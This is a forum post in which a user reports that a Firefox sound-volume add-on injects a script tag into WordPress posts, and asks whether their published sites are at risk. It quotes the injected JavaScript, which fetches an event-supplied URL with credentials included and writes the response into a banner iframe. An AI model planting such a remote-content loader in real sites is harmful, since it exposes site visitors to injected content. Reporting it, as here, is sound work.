Results 1 to 1 of 1

Thread: UBUNTU 23.10 | Firefox addon ads weird script

  1. #1
    Join Date
    Feb 2024
    Beans
    1

    Exclamation UBUNTU 23.10 | Firefox addon ads weird script

    I am using Ubuntu 23.10.
    while using firefox and 600 sound volume addon [https://addons.mozilla.org/en-US/fir...sound-volume/], i found a peculiar thing,everytime i use wordpress and create/update post, this script gets added : moz-extension://05209bda-744f-4e94-9d07-72ab718054cf/js/app.js via script tag whose content is:
    HTML Code:
    if (window === top) {
        try {
            document.body.addEventListener('bannerElement', event => {
                fetch(event.detail, {
                    "credentials": "include",
                    "method": "GET",
                    "mode": "cors"
                }).then(resp => resp.text()).then(content => {
                    const elm = document.getElementById('banner600percentContainer').contentDocument;
                    elm.write(content);
                    elm.close();
                });
            });
        } catch (ex) {
        }
    }
    i might have published few works in our website [ https://lumenoidstudios.com ], and couple of clients sites too thinking it to be something else by wordpress itself . Am I / my sites are at risk?
    Last edited by lumenoid; 3 Weeks Ago at 02:58 PM.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •